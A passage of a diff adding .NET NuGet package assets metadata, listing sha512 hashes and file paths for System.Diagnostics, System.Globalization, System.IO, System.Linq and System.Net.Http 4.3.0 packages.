"ref/netcore50/ko/System.Diagnostics.Tools.xml", + "ref/netcore50/ru/System.Diagnostics.Tools.xml", + "ref/netcore50/zh-hans/System.Diagnostics.Tools.xml", + "ref/netcore50/zh-hant/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/System.Diagnostics.Tools.dll", + "ref/netstandard1.0/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/de/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/es/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/fr/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/it/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/ja/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/ko/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/ru/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/zh-hans/System.Diagnostics.Tools.xml", + "ref/netstandard1.0/zh-hant/System.Diagnostics.Tools.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.diagnostics.tools.4.3.0.nupkg.sha512", + "system.diagnostics.tools.nuspec" + ] + }, + "System.Diagnostics.Tracing/4.3.0": { + "sha512": "rswfv0f/Cqkh78rA5S8eN8Neocz234+emGCtTF3lxPY96F+mmmUen6tbn0glN6PMvlKQb9bPAY5e9u7fgPTkKw==", + "type": "package", + "path": "system.diagnostics.tracing/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net462/System.Diagnostics.Tracing.dll", + "lib/portable-net45+win8+wpa81/_._", + "lib/win8/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net462/System.Diagnostics.Tracing.dll", + "ref/netcore50/System.Diagnostics.Tracing.dll", + "ref/netcore50/System.Diagnostics.Tracing.xml", + "ref/netcore50/de/System.Diagnostics.Tracing.xml", + "ref/netcore50/es/System.Diagnostics.Tracing.xml", + "ref/netcore50/fr/System.Diagnostics.Tracing.xml", + "ref/netcore50/it/System.Diagnostics.Tracing.xml", + "ref/netcore50/ja/System.Diagnostics.Tracing.xml", + "ref/netcore50/ko/System.Diagnostics.Tracing.xml", + "ref/netcore50/ru/System.Diagnostics.Tracing.xml", + "ref/netcore50/zh-hans/System.Diagnostics.Tracing.xml", + "ref/netcore50/zh-hant/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/System.Diagnostics.Tracing.dll", + "ref/netstandard1.1/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/de/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/es/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/fr/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/it/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/ja/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/ko/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/ru/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/zh-hans/System.Diagnostics.Tracing.xml", + "ref/netstandard1.1/zh-hant/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/System.Diagnostics.Tracing.dll", + "ref/netstandard1.2/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/de/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/es/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/fr/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/it/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/ja/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/ko/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/ru/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/zh-hans/System.Diagnostics.Tracing.xml", + "ref/netstandard1.2/zh-hant/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/System.Diagnostics.Tracing.dll", + "ref/netstandard1.3/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/de/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/es/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/fr/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/it/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/ja/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/ko/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/ru/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/zh-hans/System.Diagnostics.Tracing.xml", + "ref/netstandard1.3/zh-hant/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/System.Diagnostics.Tracing.dll", + "ref/netstandard1.5/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/de/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/es/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/fr/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/it/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/ja/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/ko/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/ru/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/zh-hans/System.Diagnostics.Tracing.xml", + "ref/netstandard1.5/zh-hant/System.Diagnostics.Tracing.xml", + "ref/portable-net45+win8+wpa81/_._", + "ref/win8/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.diagnostics.tracing.4.3.0.nupkg.sha512", + "system.diagnostics.tracing.nuspec" + ] + }, + "System.Globalization/4.3.0": { + "sha512": "kYdVd2f2PAdFGblzFswE4hkNANJBKRmsfa2X5LG2AcWE1c7/4t0pYae1L8vfZ5xvE2nK/R9JprtToA61OSHWIg==", + "type": "package", + "path": "system.globalization/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Globalization.dll", + "ref/netcore50/System.Globalization.xml", + "ref/netcore50/de/System.Globalization.xml", + "ref/netcore50/es/System.Globalization.xml", + "ref/netcore50/fr/System.Globalization.xml", + "ref/netcore50/it/System.Globalization.xml", + "ref/netcore50/ja/System.Globalization.xml", + "ref/netcore50/ko/System.Globalization.xml", + "ref/netcore50/ru/System.Globalization.xml", + "ref/netcore50/zh-hans/System.Globalization.xml", + "ref/netcore50/zh-hant/System.Globalization.xml", + "ref/netstandard1.0/System.Globalization.dll", + "ref/netstandard1.0/System.Globalization.xml", + "ref/netstandard1.0/de/System.Globalization.xml", + "ref/netstandard1.0/es/System.Globalization.xml", + "ref/netstandard1.0/fr/System.Globalization.xml", + "ref/netstandard1.0/it/System.Globalization.xml", + "ref/netstandard1.0/ja/System.Globalization.xml", + "ref/netstandard1.0/ko/System.Globalization.xml", + "ref/netstandard1.0/ru/System.Globalization.xml", + "ref/netstandard1.0/zh-hans/System.Globalization.xml", + "ref/netstandard1.0/zh-hant/System.Globalization.xml", + "ref/netstandard1.3/System.Globalization.dll", + "ref/netstandard1.3/System.Globalization.xml", + "ref/netstandard1.3/de/System.Globalization.xml", + "ref/netstandard1.3/es/System.Globalization.xml", + "ref/netstandard1.3/fr/System.Globalization.xml", + "ref/netstandard1.3/it/System.Globalization.xml", + "ref/netstandard1.3/ja/System.Globalization.xml", + "ref/netstandard1.3/ko/System.Globalization.xml", + "ref/netstandard1.3/ru/System.Globalization.xml", + "ref/netstandard1.3/zh-hans/System.Globalization.xml", + "ref/netstandard1.3/zh-hant/System.Globalization.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.globalization.4.3.0.nupkg.sha512", + "system.globalization.nuspec" + ] + }, + "System.Globalization.Calendars/4.3.0": { + "sha512": "GUlBtdOWT4LTV3I+9/PJW+56AnnChTaOqqTLFtdmype/L500M2LIyXgmtd9X2P2VOkmJd5c67H5SaC2QcL1bFA==", + "type": "package", + "path": "system.globalization.calendars/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.Globalization.Calendars.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.Globalization.Calendars.dll", + "ref/netstandard1.3/System.Globalization.Calendars.dll", + "ref/netstandard1.3/System.Globalization.Calendars.xml", + "ref/netstandard1.3/de/System.Globalization.Calendars.xml", + "ref/netstandard1.3/es/System.Globalization.Calendars.xml", + "ref/netstandard1.3/fr/System.Globalization.Calendars.xml", + "ref/netstandard1.3/it/System.Globalization.Calendars.xml", + "ref/netstandard1.3/ja/System.Globalization.Calendars.xml", + "ref/netstandard1.3/ko/System.Globalization.Calendars.xml", + "ref/netstandard1.3/ru/System.Globalization.Calendars.xml", + "ref/netstandard1.3/zh-hans/System.Globalization.Calendars.xml", + "ref/netstandard1.3/zh-hant/System.Globalization.Calendars.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.globalization.calendars.4.3.0.nupkg.sha512", + "system.globalization.calendars.nuspec" + ] + }, + "System.IO/4.3.0": { + "sha512": "3qjaHvxQPDpSOYICjUoTsmoq5u6QJAFRUITgeT/4gqkF1bajbSmb1kwSxEA8AHlofqgcKJcM8udgieRNhaJ5Cg==", + "type": "package", + "path": "system.io/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net462/System.IO.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net462/System.IO.dll", + "ref/netcore50/System.IO.dll", + "ref/netcore50/System.IO.xml", + "ref/netcore50/de/System.IO.xml", + "ref/netcore50/es/System.IO.xml", + "ref/netcore50/fr/System.IO.xml", + "ref/netcore50/it/System.IO.xml", + "ref/netcore50/ja/System.IO.xml", + "ref/netcore50/ko/System.IO.xml", + "ref/netcore50/ru/System.IO.xml", + "ref/netcore50/zh-hans/System.IO.xml", + "ref/netcore50/zh-hant/System.IO.xml", + "ref/netstandard1.0/System.IO.dll", + "ref/netstandard1.0/System.IO.xml", + "ref/netstandard1.0/de/System.IO.xml", + "ref/netstandard1.0/es/System.IO.xml", + "ref/netstandard1.0/fr/System.IO.xml", + "ref/netstandard1.0/it/System.IO.xml", + "ref/netstandard1.0/ja/System.IO.xml", + "ref/netstandard1.0/ko/System.IO.xml", + "ref/netstandard1.0/ru/System.IO.xml", + "ref/netstandard1.0/zh-hans/System.IO.xml", + "ref/netstandard1.0/zh-hant/System.IO.xml", + "ref/netstandard1.3/System.IO.dll", + "ref/netstandard1.3/System.IO.xml", + "ref/netstandard1.3/de/System.IO.xml", + "ref/netstandard1.3/es/System.IO.xml", + "ref/netstandard1.3/fr/System.IO.xml", + "ref/netstandard1.3/it/System.IO.xml", + "ref/netstandard1.3/ja/System.IO.xml", + "ref/netstandard1.3/ko/System.IO.xml", + "ref/netstandard1.3/ru/System.IO.xml", + "ref/netstandard1.3/zh-hans/System.IO.xml", + "ref/netstandard1.3/zh-hant/System.IO.xml", + "ref/netstandard1.5/System.IO.dll", + "ref/netstandard1.5/System.IO.xml", + "ref/netstandard1.5/de/System.IO.xml", + "ref/netstandard1.5/es/System.IO.xml", + "ref/netstandard1.5/fr/System.IO.xml", + "ref/netstandard1.5/it/System.IO.xml", + "ref/netstandard1.5/ja/System.IO.xml", + "ref/netstandard1.5/ko/System.IO.xml", + "ref/netstandard1.5/ru/System.IO.xml", + "ref/netstandard1.5/zh-hans/System.IO.xml", + "ref/netstandard1.5/zh-hant/System.IO.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.io.4.3.0.nupkg.sha512", + "system.io.nuspec" + ] + }, + "System.IO.Compression/4.3.0": { + "sha512": "YHndyoiV90iu4iKG115ibkhrG+S3jBm8Ap9OwoUAzO5oPDAWcr0SFwQFm0HjM8WkEZWo0zvLTyLmbvTkW1bXgg==", + "type": "package", + "path": "system.io.compression/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net46/System.IO.Compression.dll", + "lib/portable-net45+win8+wpa81/_._", + "lib/win8/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net46/System.IO.Compression.dll", + "ref/netcore50/System.IO.Compression.dll", + "ref/netcore50/System.IO.Compression.xml", + "ref/netcore50/de/System.IO.Compression.xml", + "ref/netcore50/es/System.IO.Compression.xml", + "ref/netcore50/fr/System.IO.Compression.xml", + "ref/netcore50/it/System.IO.Compression.xml", + "ref/netcore50/ja/System.IO.Compression.xml", + "ref/netcore50/ko/System.IO.Compression.xml", + "ref/netcore50/ru/System.IO.Compression.xml", + "ref/netcore50/zh-hans/System.IO.Compression.xml", + "ref/netcore50/zh-hant/System.IO.Compression.xml", + "ref/netstandard1.1/System.IO.Compression.dll", + "ref/netstandard1.1/System.IO.Compression.xml", + "ref/netstandard1.1/de/System.IO.Compression.xml", + "ref/netstandard1.1/es/System.IO.Compression.xml", + "ref/netstandard1.1/fr/System.IO.Compression.xml", + "ref/netstandard1.1/it/System.IO.Compression.xml", + "ref/netstandard1.1/ja/System.IO.Compression.xml", + "ref/netstandard1.1/ko/System.IO.Compression.xml", + "ref/netstandard1.1/ru/System.IO.Compression.xml", + "ref/netstandard1.1/zh-hans/System.IO.Compression.xml", + "ref/netstandard1.1/zh-hant/System.IO.Compression.xml", + "ref/netstandard1.3/System.IO.Compression.dll", + "ref/netstandard1.3/System.IO.Compression.xml", + "ref/netstandard1.3/de/System.IO.Compression.xml", + "ref/netstandard1.3/es/System.IO.Compression.xml", + "ref/netstandard1.3/fr/System.IO.Compression.xml", + "ref/netstandard1.3/it/System.IO.Compression.xml", + "ref/netstandard1.3/ja/System.IO.Compression.xml", + "ref/netstandard1.3/ko/System.IO.Compression.xml", + "ref/netstandard1.3/ru/System.IO.Compression.xml", + "ref/netstandard1.3/zh-hans/System.IO.Compression.xml", + "ref/netstandard1.3/zh-hant/System.IO.Compression.xml", + "ref/portable-net45+win8+wpa81/_._", + "ref/win8/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "runtimes/unix/lib/netstandard1.3/System.IO.Compression.dll", + "runtimes/win/lib/net46/System.IO.Compression.dll", + "runtimes/win/lib/netstandard1.3/System.IO.Compression.dll", + "system.io.compression.4.3.0.nupkg.sha512", + "system.io.compression.nuspec" + ] + }, + "System.IO.Compression.ZipFile/4.3.0": { + "sha512": "G4HwjEsgIwy3JFBduZ9quBkAu+eUwjIdJleuNSgmUojbH6O3mlvEIme+GHx/cLlTAPcrnnL7GqvB9pTlWRfhOg==", + "type": "package", + "path": "system.io.compression.zipfile/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.IO.Compression.ZipFile.dll", + "lib/netstandard1.3/System.IO.Compression.ZipFile.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.IO.Compression.ZipFile.dll", + "ref/netstandard1.3/System.IO.Compression.ZipFile.dll", + "ref/netstandard1.3/System.IO.Compression.ZipFile.xml", + "ref/netstandard1.3/de/System.IO.Compression.ZipFile.xml", + "ref/netstandard1.3/es/System.IO.Compression.ZipFile.xml", + "ref/netstandard1.3/fr/System.IO.Compression.ZipFile.xml", + "ref/netstandard1.3/it/System.IO.Compression.ZipFile.xml", + "ref/netstandard1.3/ja/System.IO.Compression.ZipFile.xml", + "ref/netstandard1.3/ko/System.IO.Compression.ZipFile.xml", + "ref/netstandard1.3/ru/System.IO.Compression.ZipFile.xml", + "ref/netstandard1.3/zh-hans/System.IO.Compression.ZipFile.xml", + "ref/netstandard1.3/zh-hant/System.IO.Compression.ZipFile.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.io.compression.zipfile.4.3.0.nupkg.sha512", + "system.io.compression.zipfile.nuspec" + ] + }, + "System.IO.FileSystem/4.3.0": { + "sha512": "3wEMARTnuio+ulnvi+hkRNROYwa1kylvYahhcLk4HSoVdl+xxTFVeVlYOfLwrDPImGls0mDqbMhrza8qnWPTdA==", + "type": "package", + "path": "system.io.filesystem/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.IO.FileSystem.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.IO.FileSystem.dll", + "ref/netstandard1.3/System.IO.FileSystem.dll", + "ref/netstandard1.3/System.IO.FileSystem.xml", + "ref/netstandard1.3/de/System.IO.FileSystem.xml", + "ref/netstandard1.3/es/System.IO.FileSystem.xml", + "ref/netstandard1.3/fr/System.IO.FileSystem.xml", + "ref/netstandard1.3/it/System.IO.FileSystem.xml", + "ref/netstandard1.3/ja/System.IO.FileSystem.xml", + "ref/netstandard1.3/ko/System.IO.FileSystem.xml", + "ref/netstandard1.3/ru/System.IO.FileSystem.xml", + "ref/netstandard1.3/zh-hans/System.IO.FileSystem.xml", + "ref/netstandard1.3/zh-hant/System.IO.FileSystem.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.io.filesystem.4.3.0.nupkg.sha512", + "system.io.filesystem.nuspec" + ] + }, + "System.IO.FileSystem.Primitives/4.3.0": { + "sha512": "6QOb2XFLch7bEc4lIcJH49nJN2HV+OC3fHDgsLVsBVBk3Y4hFAnOBGzJ2lUu7CyDDFo9IBWkSsnbkT6IBwwiMw==", + "type": "package", + "path": "system.io.filesystem.primitives/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net46/System.IO.FileSystem.Primitives.dll", + "lib/netstandard1.3/System.IO.FileSystem.Primitives.dll", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net46/System.IO.FileSystem.Primitives.dll", + "ref/netstandard1.3/System.IO.FileSystem.Primitives.dll", + "ref/netstandard1.3/System.IO.FileSystem.Primitives.xml", + "ref/netstandard1.3/de/System.IO.FileSystem.Primitives.xml", + "ref/netstandard1.3/es/System.IO.FileSystem.Primitives.xml", + "ref/netstandard1.3/fr/System.IO.FileSystem.Primitives.xml", + "ref/netstandard1.3/it/System.IO.FileSystem.Primitives.xml", + "ref/netstandard1.3/ja/System.IO.FileSystem.Primitives.xml", + "ref/netstandard1.3/ko/System.IO.FileSystem.Primitives.xml", + "ref/netstandard1.3/ru/System.IO.FileSystem.Primitives.xml", + "ref/netstandard1.3/zh-hans/System.IO.FileSystem.Primitives.xml", + "ref/netstandard1.3/zh-hant/System.IO.FileSystem.Primitives.xml", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.io.filesystem.primitives.4.3.0.nupkg.sha512", + "system.io.filesystem.primitives.nuspec" + ] + }, + "System.Linq/4.3.0": { + "sha512": "5DbqIUpsDp0dFftytzuMmc0oeMdQwjcP/EWxsksIz/w1TcFRkZ3yKKz0PqiYFMmEwPSWw+qNVqD7PJ889JzHbw==", + "type": "package", + "path": "system.linq/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net463/System.Linq.dll", + "lib/netcore50/System.Linq.dll", + "lib/netstandard1.6/System.Linq.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net463/System.Linq.dll", + "ref/netcore50/System.Linq.dll", + "ref/netcore50/System.Linq.xml", + "ref/netcore50/de/System.Linq.xml", + "ref/netcore50/es/System.Linq.xml", + "ref/netcore50/fr/System.Linq.xml", + "ref/netcore50/it/System.Linq.xml", + "ref/netcore50/ja/System.Linq.xml", + "ref/netcore50/ko/System.Linq.xml", + "ref/netcore50/ru/System.Linq.xml", + "ref/netcore50/zh-hans/System.Linq.xml", + "ref/netcore50/zh-hant/System.Linq.xml", + "ref/netstandard1.0/System.Linq.dll", + "ref/netstandard1.0/System.Linq.xml", + "ref/netstandard1.0/de/System.Linq.xml", + "ref/netstandard1.0/es/System.Linq.xml", + "ref/netstandard1.0/fr/System.Linq.xml", + "ref/netstandard1.0/it/System.Linq.xml", + "ref/netstandard1.0/ja/System.Linq.xml", + "ref/netstandard1.0/ko/System.Linq.xml", + "ref/netstandard1.0/ru/System.Linq.xml", + "ref/netstandard1.0/zh-hans/System.Linq.xml", + "ref/netstandard1.0/zh-hant/System.Linq.xml", + "ref/netstandard1.6/System.Linq.dll", + "ref/netstandard1.6/System.Linq.xml", + "ref/netstandard1.6/de/System.Linq.xml", + "ref/netstandard1.6/es/System.Linq.xml", + "ref/netstandard1.6/fr/System.Linq.xml", + "ref/netstandard1.6/it/System.Linq.xml", + "ref/netstandard1.6/ja/System.Linq.xml", + "ref/netstandard1.6/ko/System.Linq.xml", + "ref/netstandard1.6/ru/System.Linq.xml", + "ref/netstandard1.6/zh-hans/System.Linq.xml", + "ref/netstandard1.6/zh-hant/System.Linq.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.linq.4.3.0.nupkg.sha512", + "system.linq.nuspec" + ] + }, + "System.Linq.Expressions/4.3.0": { + "sha512": "PGKkrd2khG4CnlyJwxwwaWWiSiWFNBGlgXvJpeO0xCXrZ89ODrQ6tjEWS/kOqZ8GwEOUATtKtzp1eRgmYNfclg==", + "type": "package", + "path": "system.linq.expressions/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net463/System.Linq.Expressions.dll", + "lib/netcore50/System.Linq.Expressions.dll", + "lib/netstandard1.6/System.Linq.Expressions.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net463/System.Linq.Expressions.dll", + "ref/netcore50/System.Linq.Expressions.dll", + "ref/netcore50/System.Linq.Expressions.xml", + "ref/netcore50/de/System.Linq.Expressions.xml", + "ref/netcore50/es/System.Linq.Expressions.xml", + "ref/netcore50/fr/System.Linq.Expressions.xml", + "ref/netcore50/it/System.Linq.Expressions.xml", + "ref/netcore50/ja/System.Linq.Expressions.xml", + "ref/netcore50/ko/System.Linq.Expressions.xml", + "ref/netcore50/ru/System.Linq.Expressions.xml", + "ref/netcore50/zh-hans/System.Linq.Expressions.xml", + "ref/netcore50/zh-hant/System.Linq.Expressions.xml", + "ref/netstandard1.0/System.Linq.Expressions.dll", + "ref/netstandard1.0/System.Linq.Expressions.xml", + "ref/netstandard1.0/de/System.Linq.Expressions.xml", + "ref/netstandard1.0/es/System.Linq.Expressions.xml", + "ref/netstandard1.0/fr/System.Linq.Expressions.xml", + "ref/netstandard1.0/it/System.Linq.Expressions.xml", + "ref/netstandard1.0/ja/System.Linq.Expressions.xml", + "ref/netstandard1.0/ko/System.Linq.Expressions.xml", + "ref/netstandard1.0/ru/System.Linq.Expressions.xml", + "ref/netstandard1.0/zh-hans/System.Linq.Expressions.xml", + "ref/netstandard1.0/zh-hant/System.Linq.Expressions.xml", + "ref/netstandard1.3/System.Linq.Expressions.dll", + "ref/netstandard1.3/System.Linq.Expressions.xml", + "ref/netstandard1.3/de/System.Linq.Expressions.xml", + "ref/netstandard1.3/es/System.Linq.Expressions.xml", + "ref/netstandard1.3/fr/System.Linq.Expressions.xml", + "ref/netstandard1.3/it/System.Linq.Expressions.xml", + "ref/netstandard1.3/ja/System.Linq.Expressions.xml", + "ref/netstandard1.3/ko/System.Linq.Expressions.xml", + "ref/netstandard1.3/ru/System.Linq.Expressions.xml", + "ref/netstandard1.3/zh-hans/System.Linq.Expressions.xml", + "ref/netstandard1.3/zh-hant/System.Linq.Expressions.xml", + "ref/netstandard1.6/System.Linq.Expressions.dll", + "ref/netstandard1.6/System.Linq.Expressions.xml", + "ref/netstandard1.6/de/System.Linq.Expressions.xml", + "ref/netstandard1.6/es/System.Linq.Expressions.xml", + "ref/netstandard1.6/fr/System.Linq.Expressions.xml", + "ref/netstandard1.6/it/System.Linq.Expressions.xml", + "ref/netstandard1.6/ja/System.Linq.Expressions.xml", + "ref/netstandard1.6/ko/System.Linq.Expressions.xml", + "ref/netstandard1.6/ru/System.Linq.Expressions.xml", + "ref/netstandard1.6/zh-hans/System.Linq.Expressions.xml", + "ref/netstandard1.6/zh-hant/System.Linq.Expressions.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "runtimes/aot/lib/netcore50/System.Linq.Expressions.dll", + "system.linq.expressions.4.3.0.nupkg.sha512", + "system.linq.expressions.nuspec" + ] + }, + "System.Net.Http/4.3.0": { + "sha512": "sYg+FtILtRQuYWSIAuNOELwVuVsxVyJGWQyOnlAzhV4xvhyFnON1bAzYYC+jjRW8JREM45R0R5Dgi8MTC5sEwA==", + "type": "package", + "path": "system.net.http/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/Xamarinmac20/_._", + "lib/monoandroid10/_._", + "lib/monotouch10/_._", + "lib/net45/_._", + "lib/net46/System.Net.Http.dll", + "lib/portable-net45+win8+wpa81/_._", + "lib/win8/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/Xamarinmac20/_._", + "ref/monoandroid10/_._", + "ref/monotouch10/_._", + "ref/net45/_._", + "ref/net46/System.Net.Http.dll", + "ref/net46/System.Net.Http.xml", + "ref/net46/de/System.Net.Http.xml", + "ref/net46/es/System.Net.Http.xml", + "ref/net46/fr/System.Net.Http.xml", + 